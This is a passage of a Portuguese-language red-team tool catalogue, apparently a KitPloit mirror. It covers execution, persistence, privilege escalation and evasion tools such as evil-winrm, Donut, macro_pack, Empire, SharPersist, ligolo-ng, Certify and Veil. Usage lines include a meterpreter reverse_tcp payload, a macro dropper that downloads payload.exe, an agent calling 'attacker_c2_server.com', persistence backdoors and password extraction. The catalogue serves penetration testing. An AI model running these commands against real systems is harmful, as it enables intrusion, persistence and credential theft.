root@kitploit:~
Instruções alternativas de instalação podem ser encontradas [aqui](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods).

**Uso:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll

Full usage documentation can be found here.

image

Imagem usada de https://korbinian-spielvogel.de/posts/heist-writeup/

🔙Donut

Uma ferramenta para execução em memória de arquivos VBScript, JScript, EXE, DLL e assemblies dotNET. Pode ser usada para carregar e executar payloads personalizados em sistemas alvo sem a necessidade de gravar arquivos em disco.

Instalação: (Windows)```bash git clone http://github.com/thewover/donut.git

root@kitploit:~
Para gerar o template do loader, a biblioteca dinâmica donut.dll, a biblioteca estática donut.lib e o gerador donut.exe. Inicie um Prompt de Comando do Desenvolvedor do Microsoft Visual Studio x64, mude para o diretório onde você clonou o repositório Donut e digite o seguinte:```bash
nmake -f Makefile.msvc

Para fazer o mesmo, exceto usando MinGW-64 no Windows ou Linux, mude para o diretório onde você clonou o repositório Donut e insira o seguinte:```bash make -f Makefile.mingw

root@kitploit:~
**Instalar: (Linux)**```bash
pip3 install donut-shellcode

Uso:```bash

Creating shellcode from an XSL file that pops up a calculator.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")

Creating shellcode from an unmanaged DLL. Invokes DLLMain.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")

root@kitploit:~
Para informações completas de uso, consulte a [Página do GitHub](https://github.com/TheWover/donut/#4-usage) do donut.

Veja [uma postagem recente no blog](https://thewover.github.io/Bear-Claw/) de The Wover para mais informações.

![image](https://assets.kitploit.com/production/public/readmes/147/f1dba24c73e1bc864c83173904c6592faee2f8aa854da293767b90d69449d5c4.png)

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)

Uma ferramenta usada para automatizar a ofuscação e geração de documentos do Office, scripts VB, atalhos e outros formatos para red teaming.

**Instalação: (Binário)** 

1. Obtenha o binário mais recente em [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)
2. Baixe o binário em um PC com Microsoft Office genuíno instalado.
3. Abra o console, navegue até o diretório do binário e chame o binário.

**Instalação: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

Uso:```bash

Help Page

python3 macro_pack.py --help

List all supported file formats

macro_pack.exe --listformats

Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

Obfuscate Empire stager VBA file and generate a MS Word document:

macro_pack.exe -f empire.vba -o -G myDoc.docm

Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)

echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"

Execute calc.exe via Dynamic Data Exchange (DDE) attack

echo calc.exe | macro_pack.exe --dde -G calc.xslx

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/05a46a14fba117c71b6b79cec0cccbc403531a302add46b9e55035e7d9d634ef.png)

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)

Uma coleção de scripts e módulos do PowerShell que podem ser utilizados para alcançar diversos objetivos de red teaming.

Algumas das funcionalidades do PowerSploit:

- Despejar hashes de senhas e extrair senhas em texto claro da memória
- Elevar privilégios e contornar controles de segurança
- Executar código PowerShell arbitrário e contornar restrições de execução
- Realizar reconhecimento e descoberta de rede
- Gerar payloads e executar exploits

**Instalação:** *1. Salvar na pasta de módulos do PowerShell*

Primeiro, você precisará baixar a [Pasta PowerSploit](https://github.com/PowerShellMafia/PowerSploit) e salvá-la na sua pasta de módulos do PowerShell.

O caminho da sua pasta de módulos do PowerShell pode ser encontrado com o seguinte comando:```
$Env:PSModulePath

Instalar: 2. Instalar o PowerSploit como um módulo do PowerShell

Em seguida, você precisará instalar o módulo PowerSploit (use o nome da pasta baixada).

Nota: Sua política de execução do PowerShell pode bloqueá-lo; para corrigir isso, execute o seguinte comando.``` powershell.exe -ep bypass

root@kitploit:~
Agora você pode instalar o módulo PowerSploit.```
Import-Module PowerSploit

Uso:``` Get-Command -Module PowerSploit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/be1d37fac661a710be1a2268f5f0090e13b496c05f8d22b56d47e166072e5fff.png)

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)

Uma ferramenta que pode ser usada para realizar várias ações relacionadas a ambientes do Microsoft Active Directory (AD), como extrair hashes de senhas, criar/excluir usuários e modificar propriedades de usuários.

Algumas das funcionalidades do Rubeus:

- Kerberoasting
- Ataques de golden ticket
- Ataques de silver ticket

**Instalação: (Download)** 

Você pode instalar o binário Rubeus não oficial pré-compilado [aqui](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe). 

**Instalação: (Compilar)** 

Rubeus é compatível com o [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Abra o [projeto .sln](https://github.com/GhostPack/Rubeus) do rubeus, escolha "Release" e compile.

**Uso:**```
Rubeus.exe -h

image

🔙SharpUp

Uma ferramenta útil para verificar o endpoint de uma vítima em busca de vulnerabilidades relacionadas a processos de alta integridade, grupos, caminhos sequestráveis, etc.

Instalação: (Download)

Você pode instalar o binário SharpUp pré-compilado não oficial aqui.

Instalação: (Compilar)

SharpUp é compatível com Visual Studio 2015 Community Edition. Abra o projeto .sln do SharpUp, escolha "Release" e compile.

Uso:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.

SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.

SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/881494f39c898e7951e05d177aeaef111636ae85c7a4c9a607f337e3318f7d77.png)

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)

MS-SQL (Microsoft SQL Server) é um sistema de gerenciamento de banco de dados relacional desenvolvido e comercializado pela Microsoft.

Este toolkit C# para MS-SQL foi projetado para reconhecimento ofensivo e pós-exploração. Para informações detalhadas de uso sobre cada técnica, consulte o [wiki](https://github.com/skahwah/SQLRecon/wiki).

**Instalação: (Binário)**

Você pode baixar a versão binária mais recente [aqui](https://github.com/skahwah/SQLRecon/releases).

**Uso:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami

# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami

# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases

# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019

Informações completas de uso podem ser encontradas no wiki.

Informações de uso do módulo da ferramenta podem ser encontradas aqui.

image

Imagem usada da página de ajuda do SQLRecon

🔙UltimateAppLockerByPassList

Este recurso é uma coleção das técnicas mais comuns e conhecidas para bypass do AppLocker.

Como o AppLocker pode ser configurado de diferentes maneiras, @api0cradle mantém uma lista verificada de bypasses (que funcionam contra as regras padrão do AppLocker) e uma lista com possíveis técnicas de bypass (dependendo da configuração) ou que foram reivindicadas como bypass por alguém.

Eles também têm uma lista de técnicas genéricas de bypass, bem como uma lista legada de métodos para execução através de DLLs.

Listas Indexadas

  • Generic-AppLockerbypasses.md
  • VerifiedAppLockerBypasses.md
  • UnverifiedAppLockerBypasses.md
  • DLL-Execution.md

image

Imagem usada de https://github.com/api0cradle/UltimateAppLockerByPassList

🔙StarFighters

Um launcher do Empire baseado em JavaScript e VBScript, que é executado dentro de seu próprio host PowerShell incorporado.

Ambos os launchers são executados dentro de seu próprio host PowerShell incorporado, então não precisamos do PowerShell.exe.

Isso pode ser útil quando uma empresa está bloqueando o PowerShell.exe e/ou usando uma solução de Application Whitelisting, mas não bloqueia a execução de arquivos JS/VBS.

Uso:

  • Configure um novo Listener no PowerShell Empire
  • Use o comando Launcher para gerar um launcher PowerShell para este listener
  • Copie e substitua o payload do launcher codificado em Base64 dentro do arquivo JavaScript ou VBScript do StarFighter

Para a versão JavaScript, use a seguinte variável:```javascript var EncodedPayload = ""

root@kitploit:~
Para a versão VBScript use a seguinte variável:```vbscript
  Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"
  • Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer.

image

Imagem usada de https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html

🔙demiguise

O objetivo deste projeto é gerar arquivos .html que contenham um arquivo HTA criptografado.

A ideia é que, quando seu alvo visitar a página, a chave seja obtida e o HTA seja descriptografado dinamicamente no navegador e enviado diretamente ao usuário.

Esta é uma técnica de evasão para contornar a inspeção de conteúdo / tipo de arquivo implementada por alguns appliances de segurança.

Mais informações técnicas aqui.

Instalação:``` git clone https://github.com/nccgroup/demiguise cd demiguise

root@kitploit:~
**Uso:**```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

image

Imagem usada de https://github.com/nccgroup/demiguise

🔙PowerZure

PowerZure é um projeto PowerShell criado para avaliar e explorar recursos na plataforma de nuvem da Microsoft, o Azure. PowerZure foi criado pela necessidade de um framework que possa realizar tanto reconhecimento quanto exploração do Azure, AzureAD e os recursos associados.

Não há absolutamente nenhuma razão para executar PowerZure na máquina de uma vítima. A autenticação é feita usando um arquivo accesstoken.json existente ou fazendo login via prompt ao entrar no Azure, o que significa que você pode usar o PowerZure com segurança para interagir com a instância de nuvem de uma vítima a partir da sua máquina de operação.

Instalação:```bash Install-Module -Name Az git clone https://github.com/hausec/PowerZure cd PowerZure ipmo C:\path\to\PowerZure.psd1

root@kitploit:~
**Uso:**```bash
# Get a list of AzureAD and Azure objects you have access to
Get-AzureTarget

Blog - Atacando Azure, Azure AD e Apresentando PowerZure

image

Imagem usada de https://hakin9.org

Persistência

🔙Impacket

O Impacket fornece um conjunto de bindings Python de baixo nível para vários protocolos de rede, incluindo SMB, Kerberos e LDAP, além de bibliotecas de alto nível para interagir com serviços de rede e realizar tarefas específicas como extrair hashes de senhas e criar compartilhamentos de rede.

Ele também inclui várias ferramentas de linha de comando que podem ser usadas para realizar diversas tarefas, como extrair bancos de dados SAM, enumerar confianças de domínio e quebrar senhas do Windows.

Instalação:```bash python3 -m pip install impacket

root@kitploit:~
**Instalação: (Com Scripts de Exemplo)** 

Baixe e extraia [o pacote](https://github.com/fortra/impacket) e, em seguida, navegue até a pasta de instalação e execute...```bash
python3 -m pip install .

Uso:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

Gets a list of the sessions opened at the remote hosts

netview.py domain/user:password -target 192.168.10.2

Retrieves the MSSQL instances names from the target host.

mssqlinstance.py 192.168.1.2

This script will gather data about the domain's users and their corresponding email addresses.

GetADUsers.py domain/user:password@IP

root@kitploit:~
Excelente [folha de dicas](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) para uso do Impacket.

![image](https://assets.kitploit.com/production/public/readmes/147/2be6291c92daeeea07d0afe27bcf2ecde2bd9676d07e84e8b7c6ee823887e902.png)

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)

O Empire é um framework de pós-exploração que permite gerar payloads para estabelecer conexões remotas com sistemas vítimas.

Uma vez que um payload é executado em um sistema vítima, ele estabelece uma conexão de volta ao servidor Empire, que pode então ser usado para emitir comandos e controlar o sistema alvo.

O Empire também inclui vários módulos e scripts embutidos que podem ser usados para realizar tarefas específicas, como extrair hashes de senhas, acessar o registro do Windows e exfiltrar dados.

**Instalação:**```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh

Uso:```bash

Start Empire

./empire

List live agents

list agents

List live listeners

list listeners

root@kitploit:~
Bela folha de dicas de uso [cheat sheet](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) por [HarmJoy](https://github.com/HarmJ0y).

![image](https://user-images.githubusercontent.com/100603074/210080911-b3c7572a-a0dd-4664-a1e3-46b343db8a79.png)

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)

Um kit de ferramentas de persistência no Windows escrito em C#.

O projeto tem uma [wiki](https://github.com/mandiant/SharPersist/wiki).

**Instalação: (Binário)** 

Você pode encontrar a versão mais recente [aqui](https://github.com/mandiant/SharPersist/releases).

**Instalação: (Compilar)** 

- Baixe os arquivos do projeto do [Repositório GitHub](https://github.com/mandiant/SharPersist).
- Carregue o projeto do Visual Studio e vá para "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
- Vá para "NuGet Package Manager" --> "Package Sources"
- Adicione uma fonte de pacote com a URL "https://api.nuget.org/v3/index.json"
- Instale o pacote NuGet Costura.Fody. A versão mais antiga do Costura.Fody (3.3.3) é necessária, para que você não precise do Visual Studio 2019.
	- `Install-Package Costura.Fody -Version 3.3.3`
- Instale o pacote TaskScheduler
	- `Install-Package TaskScheduler -Version 2.8.11`
- Agora você pode compilar o projeto por conta própria!

**Uso:**

Uma lista completa de exemplos de uso pode ser encontrada [aqui](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).```
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add 

#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

image

🔙ligolo-ng

Ligolo-ng é uma ferramenta simples, leve e rápida que permite que pentesters estabeleçam túneis a partir de uma conexão reversa TCP/TLS usando uma interface tun (sem a necessidade de SOCKS).

Em vez de usar um proxy SOCKS ou redirecionadores TCP/UDP, Ligolo-ng cria uma pilha de rede em espaço de usuário usando Gvisor.

Ao executar o servidor relay/proxy, uma interface tun é usada, os pacotes enviados para esta interface são traduzidos e, em seguida, transmitidos para a rede remota do agente.

Instalação: (Download)

Binários pré-compilados (Windows/Linux/macOS) estão disponíveis na página de lançamento.

Instalação: (Build)

Construir ligolo-ng (Go >= 1.17 é necessário):```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go

Build for Windows

GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go

root@kitploit:~
**Configuração: (Linux)**```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

Configuração: (Windows)

Você precisa baixar o driver Wintun (usado pelo WireGuard) e colocar o wintun.dll na mesma pasta do Ligolo (certifique-se de usar a arquitetura correta).

Configuração: (Servidor proxy)```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates

root@kitploit:~
**Uso:**

*Inicie o agente no computador alvo (vítima) (nenhuma permissão é necessária!):*```bash
./agent -connect attacker_c2_server.com:11601

Uma sessão deve aparecer no servidor proxy.``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

root@kitploit:~
Use o comando session para selecionar o agente.```
ligolo-ng » session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

As informações completas de uso podem ser encontradas aqui.

image

Imagem usada de https://github.com/nicocha30/ligolo-ng#demo

Escalação de Privilégios

🔙Crassus

"A Accenture criou uma ferramenta chamada Spartacus, que encontra oportunidades de sequestro de DLL no Windows. Usando o Spartacus como ponto de partida, criamos o Crassus para expandir as capacidades de descoberta de escalação de privilégios no Windows para além da simples busca por arquivos ausentes. As ACLs usadas por arquivos e diretórios de processos privilegiados podem encontrar mais do que apenas procurar arquivos ausentes para atingir o objetivo." - Link

Instalação: (Compilação)

O Crassus foi desenvolvido como um projeto do Visual Studio 2019. Para compilar o Crassus.exe:

  1. Abra o Crassus.sln
  2. Pressione Ctrl+Shift+B no teclado

Instalação: (pré-compilado)

Se você confia em executar o código de outras pessoas sem saber o que ele faz, o Crassus.exe está disponível neste repositório.

Uso:

  1. No Process Monitor, selecione a opção Enable Boot Logging.
  2. Reinicie.
  3. Depois de fazer login e o Windows estabilizar, opcionalmente, execute também tarefas agendadas que podem estar configuradas para serem executadas com privilégios.
  4. Execute o Process Monitor novamente.
  5. Quando solicitado, salve o log de inicialização.
  6. Redefina o filtro padrão do Process Monitor usando Ctrl-R.
  7. Salve este arquivo de log, por exemplo, como boot.PML. O motivo de salvar novamente o arquivo de log é duplo:
    1. Versões mais antigas do Process Monitor não salvam logs de inicialização como um único arquivo.
    2. Os logs de inicialização, por padrão, não são filtrados, o que pode conter ruído extra, como um sequestro de DLL de usuário local na inicialização do próprio Process Monitor.

Crassus

Imagem usada de https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots

🔙LinPEAS

O LinPEAS é uma boa ferramenta de escalação de privilégios detalhada para encontrar rotas de privesc local em endpoints Linux.

Instalação + Uso:```bash curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/75977a81eeb607a2ef06b8524e1792579aa3dc5b245596ee7eeed5938d75f279.png)

### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)

O WinPEAS é uma ferramenta de elevação de privilégios bastante detalhada para encontrar caminhos de privesc local em endpoints Windows.

**Instalação + Uso:**```bash
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

image

🔙linux-smart-enumeration

O linux smart enumeration é outra boa ferramenta de privesc para Linux, menos verbosa.

Instalação + Uso:```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/0d46a6a3c94f9ce73617ebb098962e9d6d630489e557e57adba93bd24d562808.png)

### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)

O Certify é uma ferramenta em C# para enumerar e explorar configurações incorretas no Active Directory Certificate Services (AD CS).

O Certify foi projetado para ser usado em conjunto com outras ferramentas e técnicas de red team, como Mimikatz e PowerShell, para permitir que os red teamers realizem vários tipos de ataques, incluindo ataques man-in-the-middle, ataques de impersonação e ataques de elevação de privilégio.

**Principais recursos do Certify:**

- Criação de certificados
- Assinatura de certificados
- Importação de certificados
- Modificação de confiança de certificados

**Instalação: (Compilar)**

O Certify é compatível com o [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Abra o projeto do Certify [.sln](https://github.com/GhostPack/Certify), escolha "Release" e compile.

**Instalação: (Executar o Certify via PowerShell)**

Se você quiser executar o Certify na memória por meio de um wrapper do PowerShell, primeiro compile o Certify e codifique o assembly resultante em base64:```bash
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

O Certify pode então ser carregado em um script do PowerShell com o seguinte (onde "aa..." é substituído pela string de assembly do Certify codificada em base64):``` $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

root@kitploit:~
O método Main() e quaisquer argumentos podem então ser invocados da seguinte forma:```
[Certify.Program]::Main("find /vulnerable".Split())

Instruções completas de compilação podem ser encontradas aqui.

Uso:```bash

See if there are any vulnerable templates

Certify.exe find /vulnerable

Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal

Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

root@kitploit:~
O exemplo completo pode ser encontrado [aqui](https://github.com/GhostPack/Certify#example-walkthrough).

![imagem](https://assets.kitploit.com/production/public/readmes/147/d984105311fed30083e84cdfaa7b63d2f22b85f5dbb448a7162e102241203e1f.png)

### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)

O Get-GPPPassword é um script PowerShell que faz parte do toolkit PowerSploit, projetado para recuperar senhas de contas locais que são criadas e gerenciadas usando as Políticas de Preferências de Grupo (GPP).

O Get-GPPPassword funciona pesquisando na pasta SYSVOL do controlador de domínio por quaisquer arquivos GPP que contenham informações de senha. Assim que encontra esses arquivos, ele descriptografa as informações de senha e as exibe para o usuário.

**Instalação:** 

Siga as [instruções de instalação](https://github.com/A-poc/RedTeam-Tools#powersploit) do PowerSploit desta ficha de ferramentas.```bash
powershell.exe -ep bypass
Import-Module PowerSploit

Uso:```bash

Get all passwords with additional information

Get-GPPPassword

Get list of all passwords

Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/2274ad1205f7c6b2db0c3511427e21868bb0d4ba5e2bad1171156819ce417662.png)

### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)

Script PowerShell para encontrar rapidamente patches de software ausentes para vulnerabilidades de escalonamento de privilégios local.

*Suporta:*

- MS10-015 : Modo de Usuário para Ring (KiTrap0D)
- MS10-092 : Agendador de Tarefas
- MS13-053 : Estouro do Pool do Kernel Win32k NTUserMessageCall
- MS13-081 : Página NULL Win32k TrackPopupMenuEx
- MS14-058 : Desreferenciamento de Ponteiro Nulo Win32k TrackPopupMenu
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : Estouro de Buffer do Driver de Fonte
- MS16-016 : 'mrxdav.sys' WebDAV
- MS16-032 : Identificador de Logon Secundário
- MS16-034 : EoP de Drivers em Modo Kernel do Windows
- MS16-135 : Elevação de Privilégio Win32k
- CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc

**Instalação: (PowerShell)**```bash
# Git install
git clone https://github.com/rasta-mouse/Sherlock

# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1

Uso: (PowerShell)```bash

Run all functions

Find-AllVulns

Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)

Find-MS14058

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/0a46401aa0ece2211b30e76a9d2138453ec5f98cfb69416a2607084c10612993.png)

*Imagem usada de https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/*

### [🔙](#tool-list)[Watson](https://github.com/rasta-mouse/Watson)

Watson é uma ferramenta .NET projetada para enumerar KBs ausentes e sugerir exploits para vulnerabilidades de escalonamento de privilégios.

Ótimo para identificar patches ausentes e sugerir exploits que podem ser usados para explorar vulnerabilidades conhecidas, a fim de obter privilégios mais altos no sistema.

**Instalação:** 

Usando [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Abra o [projeto Watson .sln](https://github.com/rasta-mouse/Watson), escolha "Release" e compile.

**Uso:**```bash
# Run all checks
Watson.exe

image

Texto da imagem usado de https://github.com/rasta-mouse/Watson#usage

🔙ImpulsiveDLLHijack

Uma ferramenta baseada em C# que automatiza o processo de descoberta e exploração de DLL Hijacks em binários alvo.

Os caminhos Hijacked descobertos podem ser armados, durante um engagement, para evadir EDRs.

Instalação:

  • Procmon.exe -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • DLLs Confirmatórias Personalizadas :
    • Estes são arquivos DLL que auxiliam a ferramenta a obter a confirmação se as DLLs foram carregadas com sucesso a partir do caminho de hijack identificado
    • Compilado a partir do projeto MalDLL fornecido acima (ou use os binários pré-compilados se confiar em mim!)
    • O nome da DLL 32Bits deve ser: maldll32.dll
    • O nome da DLL 64Bits deve ser: maldll64.dll
    • Instalar Pacote NuGet:** PeNet** -> https://www.nuget.org/packages/PeNet/ (Pré-requisito ao compilar o projeto ImpulsiveDLLHijack)

Nota: os pré-requisitos i & ii devem ser colocados no próprio diretório do ImpulsiveDLLHijacks.exe.

  • Informações de Compilação e Configuração:

    • ImpulsiveDLLHijack

      • Clone o repositório no Visual Studio
      • Assim que o projeto estiver carregado no Visual Studio, vá em "Project" --> "Manage NuGet packages" --> Procure por pacotes e instale "PeNet" -> https://www.nuget.org/packages/PeNet/
      • Compile o projeto!
      • O ImpulsiveDLLHijack.exe estará dentro do diretório bin.
    • E para as DLLs Confirmatórias:

      • Clone o repositório no Visual Studio
      • Compile o projeto com x86 e x64
      • Renomeie a release x86 como maldll32.dll e a release x64 como maldll64.dll
    • Configuração: Copie as DLLs Confirmatórias (maldll32 & maldll64) no diretório do ImpulsiveDLLHijack.exe e então execute ImpulsiveDLLHijack.exe :))

Instruções de instalação de https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites

Uso:```bash

Help

ImpulsiveDLLHijack.exe -h

Look for vulnerabilities in an executable

ImpulsiveDLLHijack.exe -path BINARY_PATH

root@kitploit:~
Exemplos de uso podem ser encontrados [aqui](https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples).

![image](https://assets.kitploit.com/production/public/readmes/147/acedd276f532d4b77d4a5f9d0d93f9d926ba6b0afd1da582b94410c32eb47ea1.png)

*Imagem usada de https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples*

### [🔙](#tool-list)[ADFSDump](https://github.com/mandiant/ADFSDump)

Uma ferramenta em C# para extrair todos os tipos de goodies do AD FS.

Criado por Doug Bienstock [@doughsec](https://twitter.com/doughsec) enquanto estava na Mandiant FireEye.

Esta ferramenta foi projetada para ser executada em conjunto com o ADFSpoof. O ADFSdump irá gerar todas as informações necessárias para gerar tokens de segurança usando o ADFSpoof.

**Requisitos:**

- O ADFSDump deve ser executado sob o contexto de usuário da conta de serviço do AD FS. Você pode obter esta informação executando uma listagem de processos no servidor AD FS ou a partir da saída do cmdlet Get-ADFSProperties. Apenas a conta de serviço do AD FS possui as permissões necessárias para acessar o banco de dados de configuração. Nem mesmo um DA pode acessá-lo.
- O ADFSDump assume que o serviço está configurado para usar o Windows Internal Database (WID). Embora seja trivial suportar um servidor SQL externo, este recurso não existe atualmente.
- O ADFSDump deve ser executado localmente em um servidor AD FS, NÃO em um proxy de aplicação web do AD FS. O WID só pode ser acessado localmente via um named pipe.

**Instalação: (Compilar)** 

O ADFSDump foi compilado para .NET 4.5 com Visual Studio 2017 Community Edition. Basta abrir o projeto .sln, escolher "Release" e compilar.

**Uso: (Flags)**```bash
# The Active Directory domain to target. Defaults to the current domain.
/domain:

# The Domain Controller to target. Defaults to the current DC.
/server:

# Switch. Toggle to disable outputting the DKM key.
/nokey

# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.
/database

Blog - Explorando o Ataque Golden SAML Contra o ADFS

image

Imagem usada de https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs

🔙BeRoot

O Projeto BeRoot é uma ferramenta de pós-exploração para verificar configurações incorretas comuns e encontrar uma maneira de escalar nosso privilégio.

O objetivo do BeRoot é apenas gerar oportunidades potenciais de escalação de privilégio e não uma avaliação de configuração do endpoint.

Este projeto funciona em Windows, Linux e Mac OS.

Instalação: (Linux)```bash git clone https://github.com/AlessandroZ/BeRoot cd BeRoot/Linux/

root@kitploit:~
**Instalação: (Windows)** 

Uma versão pré-compilada do BeRoot pode ser encontrada [aqui](https://github.com/AlessandroZ/BeRoot/releases).

**Uso:**```bash
# Run BeRoot
python beroot.py

# Run BeRoot with user password (If you know the password use it, you could get more results)
python beroot.py --password super_strong_password

Mais informações podem ser encontradas aqui para:

  • Linux
  • Windows

image

Imagem usada de https://github.com/AlessandroZ/BeRoot

Evasão de Defesa

🔙Invoke-Obfuscation

Um ofuscador de scripts e comandos PowerShell compatível com PowerShell v2.0+. Se um endpoint vítima for capaz de executar PowerShell, esta ferramenta é excelente para criar scripts altamente ofuscados.

Instalação:```bash git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

root@kitploit:~
**Uso:**```bash
./Invoke-Obfuscation

image

🔙Veil

Veil é uma ferramenta para gerar payloads metasploit que contornam soluções antivírus comuns.

Pode ser usado para gerar shellcode ofuscado, veja o blog oficial do veil framework para mais informações.

Instalação: (Kali)```bash apt -y install veil /usr/share/veil/config/setup.sh --force --silent

root@kitploit:~
**Instalar: (Git)**```bash
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

Uso:```bash

List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-payloads

List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-encoders

Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234

./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234

